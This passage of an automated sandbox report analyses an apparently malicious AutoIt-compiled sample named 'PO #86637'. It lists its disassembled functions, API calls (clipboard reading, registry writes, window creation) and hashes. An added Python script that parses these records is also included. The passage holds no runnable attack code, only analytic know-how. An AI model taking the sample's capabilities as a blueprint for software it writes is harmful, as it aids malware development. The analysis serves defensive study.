                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                      • GetStockObject.GDI32(00000011), ref: 004593D3
                      • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                      • API String ID: 2910397461-517079104
                      • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                      • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                      • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                      • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                      • API String ID: 1038674560-3360698832
                      • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                      • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                      • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                      • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                      APIs
                      • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                      • SetCursor.USER32(00000000), ref: 0043075B
                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                      • SetCursor.USER32(00000000), ref: 00430773
                      • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                      • SetCursor.USER32(00000000), ref: 0043078B
                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                      • SetCursor.USER32(00000000), ref: 004307A3
                      • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                      • SetCursor.USER32(00000000), ref: 004307BB
                      • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                      • SetCursor.USER32(00000000), ref: 004307D3
                      • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                      • SetCursor.USER32(00000000), ref: 004307EB
                      • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                      • SetCursor.USER32(00000000), ref: 00430803
                      • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                      • SetCursor.USER32(00000000), ref: 0043081B
                      • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                      • SetCursor.USER32(00000000), ref: 00430833
                      • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                      • SetCursor.USER32(00000000), ref: 0043084B
                      • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                      • SetCursor.USER32(00000000), ref: 00430863
                      • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                      • SetCursor.USER32(00000000), ref: 0043087B
                      • SetCursor.USER32(00000000), ref: 00430887
                      • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                      • SetCursor.USER32(00000000), ref: 0043089F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Cursor$Load
                      • String ID:
                      • API String ID: 1675784387-0
                      • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                      • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                      • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                      • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                      APIs
                      • GetSysColor.USER32(0000000E), ref: 00430913
                      • SetTextColor.GDI32(?,00000000), ref: 0043091B
                      • GetSysColor.USER32(00000012), ref: 00430933
                      • SetTextColor.GDI32(?,?), ref: 0043093B
                      • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                      • GetSysColor.USER32(0000000F), ref: 00430959
                      • CreateSolidBrush.GDI32(?), ref: 00430962
                      • GetSysColor.USER32(00000011), ref: 00430979
                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                      • SelectObject.GDI32(?,00000000), ref: 0043099C
                      • SetBkColor.GDI32(?,?), ref: 004309A6
                      • SelectObject.GDI32(?,?), ref: 004309B4
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                      • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                      • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                      • DrawFocusRect.USER32(?,?), ref: 00430A91
                      • GetSysColor.USER32(00000011), ref: 00430A9F
                      • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                      • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                      • SelectObject.GDI32(?,?), ref: 00430AD0
                      • DeleteObject.GDI32(00000105), ref: 00430ADC
                      • SelectObject.GDI32(?,?), ref: 00430AE3
                      • DeleteObject.GDI32(?), ref: 00430AE9
                      • SetTextColor.GDI32(?,?), ref: 00430AF0
                      • SetBkColor.GDI32(?,?), ref: 00430AFB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                      • String ID:
                      • API String ID: 1582027408-0
                      • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                      • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                      • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                      • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                      APIs
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                      • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CloseConnectCreateRegistry
                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                      • API String ID: 3217815495-966354055
                      • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                      • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                      • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                      • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                      APIs
                      • GetCursorPos.USER32(?), ref: 004566AE
                      • GetDesktopWindow.USER32 ref: 004566C3
                      • GetWindowRect.USER32(00000000), ref: 004566CA
                      • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                      • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                      • DestroyWindow.USER32(?), ref: 00456746
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                      • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                      • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                      • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                      • IsWindowVisible.USER32(?), ref: 0045682C
                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                      • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                      • GetWindowRect.USER32(?,?), ref: 00456873
                      • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                      • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                      • CopyRect.USER32(?,?), ref: 004568BE
                      • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                      • String ID: ($,$tooltips_class32
                      • API String ID: 225202481-3320066284
                      • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                      • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                      • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                      • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                      APIs
                      • OpenClipboard.USER32(?), ref: 0046DCE7
                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                      • CloseClipboard.USER32 ref: 0046DD0D
                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                      • CloseClipboard.USER32 ref: 0046DD41
                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                      • CloseClipboard.USER32 ref: 0046DD99
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                      • String ID:
                      • API String ID: 15083398-0
                      • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                      • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                      • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                      • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
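                      The "APIs" records on this page (including the cursor-loading function at 00430754 onward and the clipboard function just above) all follow one line format: an optional "Part of subcall function <addr>:" prefix, then Api.MODULE(args), then the call-site address after "ref:". The following Python script is an added example, not part of the Joe Sandbox report or of its IDA plugin: it parses that format into records and resolves two constant families that appear in the listings, the clipboard format passed to GetClipboardData (CF_TEXT = 1, CF_UNICODETEXT = 0xD) and the IDC_* cursor resource IDs passed to LoadCursorW, both as defined in winuser.h. The sample inputs are copied from the listings on this page; the function, field and table names are my own. Argument tokens that are neither eight hex digits nor "?" are kept as raw strings.

```python
"""Parse the per-function "APIs" records of a Joe Sandbox report and
resolve a few Win32 constants.  Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import Optional

# One record per line, e.g.
#   • GetClipboardData.USER32(0000000D), ref: 0046DD01
#   • GetDesktopWindow.USER32 ref: 004566C3
#   • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
API_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple                 # raw tokens: 8 hex digits, "?" (unresolved) or a string literal
    ref: int                    # call-site address
    subcall_of: Optional[int]   # caller address for "Part of subcall function" entries


def parse_api_lines(text: str) -> list:
    """Return the ApiCall records found in text; non-matching lines (section
    headers such as "Memory Dump Source") are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("module"), args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None))
    return calls


def as_int(tok: str) -> Optional[int]:
    """Decode an 8-hex-digit token; "?" and string literals give None.
    Caveat: a string literal that happens to be 8 hex digits would be misread."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


# Standard clipboard formats and IDC_* cursor IDs (MAKEINTRESOURCE values) from winuser.h.
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}
IDC_CURSORS = {
    0x7F00: "IDC_ARROW", 0x7F01: "IDC_IBEAM", 0x7F02: "IDC_WAIT", 0x7F03: "IDC_CROSS",
    0x7F04: "IDC_UPARROW", 0x7F82: "IDC_SIZENWSE", 0x7F83: "IDC_SIZENESW",
    0x7F84: "IDC_SIZEWE", 0x7F85: "IDC_SIZENS", 0x7F86: "IDC_SIZEALL",
    0x7F88: "IDC_NO", 0x7F89: "IDC_HAND", 0x7F8A: "IDC_APPSTARTING", 0x7F8B: "IDC_HELP",
}


def clipboard_formats_read(calls) -> list:
    """Formats actually handed to GetClipboardData, in call order."""
    return [CLIPBOARD_FORMATS.get(as_int(c.args[0]), c.args[0])
            for c in calls if c.api == "GetClipboardData" and c.args]


def cursors_loaded(calls) -> list:
    """IDC_* names for each LoadCursorW(NULL, id) call, in call order."""
    return [IDC_CURSORS.get(as_int(c.args[1]), c.args[1])
            for c in calls if c.api == "LoadCursorW" and len(c.args) == 2]


# Sample input copied from the APIs listings on this page.
SAMPLE_CLIPBOARD = """
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
"""
SAMPLE_CURSOR = """
• LoadCursorW.USER32(00000000,00007F89), ref: 00430754
• SetCursor.USER32(00000000), ref: 0043075B
• LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
• LoadCursorW.USER32(00000000,00007F03), ref: 00430784
"""

if __name__ == "__main__":
    print(clipboard_formats_read(parse_api_lines(SAMPLE_CLIPBOARD)))  # ['CF_UNICODETEXT', 'CF_TEXT']
    print(cursors_loaded(parse_api_lines(SAMPLE_CURSOR)))             # ['IDC_HAND', 'IDC_APPSTARTING', 'IDC_CROSS']
```

                      Run against the clipboard function this shows that both CF_UNICODETEXT and CF_TEXT are read, which is the behaviour the "Contains functionality for read data from the clipboard" signature keys on; the "Part of subcall function" prefix is kept as subcall_of so that a caller's own calls can be separated from those inherited from callees.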
                      APIs
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • GetWindowRect.USER32(?,?), ref: 00471CF7
                      • GetClientRect.USER32(?,?), ref: 00471D05
                      • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                      • GetSystemMetrics.USER32(00000008), ref: 00471D20
                      • GetSystemMetrics.USER32(00000004), ref: 00471D42
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                      • GetSystemMetrics.USER32(00000007), ref: 00471D79
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                      • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                      • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                      • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                      • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                      • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                      • GetClientRect.USER32(?,?), ref: 00471E8A
                      • GetStockObject.GDI32(00000011), ref: 00471EA6
                      • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                      • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                      • String ID: @$AutoIt v3 GUI
                      • API String ID: 867697134-3359773793
                      • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                      • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                      • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                      • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsicoll$__wcsnicmp
                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                      • API String ID: 790654849-32604322
                      • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                      • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                      • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                      • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                      • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                      • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                      • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                      APIs
                        • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                      • _fseek.LIBCMT ref: 00452B3B
                      • __wsplitpath.LIBCMT ref: 00452B9B
                      • _wcscpy.LIBCMT ref: 00452BB0
                      • _wcscat.LIBCMT ref: 00452BC5
                      • __wsplitpath.LIBCMT ref: 00452BEF
                      • _wcscat.LIBCMT ref: 00452C07
                      • _wcscat.LIBCMT ref: 00452C1C
                      • __fread_nolock.LIBCMT ref: 00452C53
                      • __fread_nolock.LIBCMT ref: 00452C64
                      • __fread_nolock.LIBCMT ref: 00452C83
                      • __fread_nolock.LIBCMT ref: 00452C94
                      • __fread_nolock.LIBCMT ref: 00452CB5
                      • __fread_nolock.LIBCMT ref: 00452CC6
                      • __fread_nolock.LIBCMT ref: 00452CD7
                      • __fread_nolock.LIBCMT ref: 00452CE8
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
